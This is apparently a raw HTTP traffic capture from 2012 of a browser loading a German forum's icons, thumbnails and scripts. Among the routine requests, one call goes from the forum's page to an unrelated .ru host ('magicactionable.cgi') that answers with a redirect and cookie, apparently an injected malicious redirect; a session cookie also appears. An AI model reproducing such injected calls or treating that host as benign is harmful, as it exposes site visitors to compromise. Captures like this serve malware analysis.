Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 07 Mar 2011 18:40:53 GMT
Etag: &quot;2fc2a98-345-49de8d5df5740&quot;
Accept-Ranges: bytes
Content-Length: 837
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /icon/indexM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08c7-4ea-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 1258
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wcf/icon/linkListM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 13 Jul 2010 14:50:06 GMT
Etag: &quot;2fc2b0e-78e-48b45fc230380&quot;
Accept-Ranges: bytes
Content-Length: 1934
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wcf/icon/mapM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Wed, 28 Jul 2010 17:05:56 GMT
Etag: &quot;2fc2b1f-3f7-48c75a188c500&quot;
Accept-Ranges: bytes
Content-Length: 1015
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /icon/indexL.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08c6-836-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 2102
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wcf/icon/searchM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2bc6-416-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 1046
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /icon/boardClosedM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Fri, 17 Apr 2009 19:15:04 GMT
Etag: &quot;2fc08a9-5b1-467c4ff75be00&quot;
Accept-Ranges: bytes
Content-Length: 1457
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wcf/icon/upS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2c3c-2a4-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 676
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wcf/icon/minusS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2b33-11b-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 283
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wcf/js/3rdParty/protoaculous.1.8.2.min.js HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 05 Nov 2012 15:00:29 GMT
Etag: &quot;2fc38af-2500c-4cdc0bf047d40&quot;
Accept-Ranges: bytes
Content-Length: 151564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /icon/goToFirstNewPostS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08c2-29e-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 670
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wcf/icon/usersS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2c68-397-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 919
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /icon/boardNewM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08b2-5d0-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 1488
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /icon/boardM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08b0-4c8-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 1224
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /icon/boardS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08b6-33d-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 829
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wcf/icon/searchHeadS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/wcf/style/style-6.css
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 12 May 2009 13:30:29 GMT
Etag: &quot;2fc2bc4-218-469b7192aa740&quot;
Accept-Ranges: bytes
Content-Length: 536
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /wcf/icon/searchSubmitS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 07 Mar 2011 18:38:23 GMT
Etag: &quot;2fc2bc7-275-49de8ccee85c0&quot;
Accept-Ranges: bytes
Content-Length: 629
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /icon/boardNewS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc08b3-3a9-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 937
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /icon/statisticsM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc0920-5e8-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 1512
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /wcf/icon/infoM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/wcf/style/style-6.css
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2aba-3eb-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 1003
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wcf/images/photos/thumbnails/tiny/photo-825-a0c788dc.jpg HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 30 Oct 2012 21:33:58 GMT
Etag: &quot;2fc06bc-1377-4cd4d8b2cfd80&quot;
Accept-Ranges: bytes
Content-Length: 4983
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
GET /wcf/icon/membersM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 07 Mar 2011 18:38:20 GMT
Etag: &quot;2fc2b22-572-49de8ccc0bf00&quot;
Accept-Ranges: bytes
Content-Length: 1394
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wcf/icon/calendarEventsM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Thu, 29 Jul 2010 18:49:34 GMT
Etag: &quot;2fc29d9-53d-48c8b31ff4b80&quot;
Accept-Ranges: bytes
Content-Length: 1341
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /icon/generalStatsS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Wed, 06 Jun 2007 20:18:58 GMT
Etag: &quot;2fc08c1-29c-43242820d9080&quot;
Accept-Ranges: bytes
Content-Length: 668
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wcf/images/photos/thumbnails/tiny/photo-824-5f016b93.jpg HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Fri, 26 Oct 2012 10:54:57 GMT
Etag: &quot;2fc0687-15f1-4ccf426824240&quot;
Accept-Ranges: bytes
Content-Length: 5617
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wcf/images/photos/thumbnails/tiny/photo-821-daca1cfe.jpg HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Thu, 25 Oct 2012 14:23:44 GMT
Etag: &quot;2fc066d-1b8a-4cce2f355bc00&quot;
Accept-Ranges: bytes
Content-Length: 7050
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
GET /magicactionable.cgi?8 HTTP/1.1

Host: nullifiedfilebyfile.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 19:04:17 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Tue, 06-Nov-2012 19:04:17 GMT; path=/; domain=nullifiedfilebyfile.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /mobiquo/tapatalkdetect.js HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 05 Nov 2012 15:00:29 GMT
Etag: &quot;2a20ba2-854-4cdc0bf047d40&quot;
Accept-Ranges: bytes
Content-Length: 2132
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /wcf/icon/pollM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:20:21 GMT
Etag: &quot;2fc2ba7-607-43af66fecd340&quot;
Accept-Ranges: bytes
Content-Length: 1543
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
GET /wcf/images/photos/thumbnails/tiny/photo-823-da8b8341.jpg HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Thu, 25 Oct 2012 14:23:51 GMT
Etag: &quot;2fc0679-1483-4cce2f3c08bc0&quot;
Accept-Ranges: bytes
Content-Length: 5251
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wcf/images/photos/thumbnails/tiny/photo-822-8545891b.jpg HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Thu, 25 Oct 2012 14:23:47 GMT
Etag: &quot;2fc0673-1ad3-4cce2f38382c0&quot;
Accept-Ranges: bytes
Content-Length: 6867
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
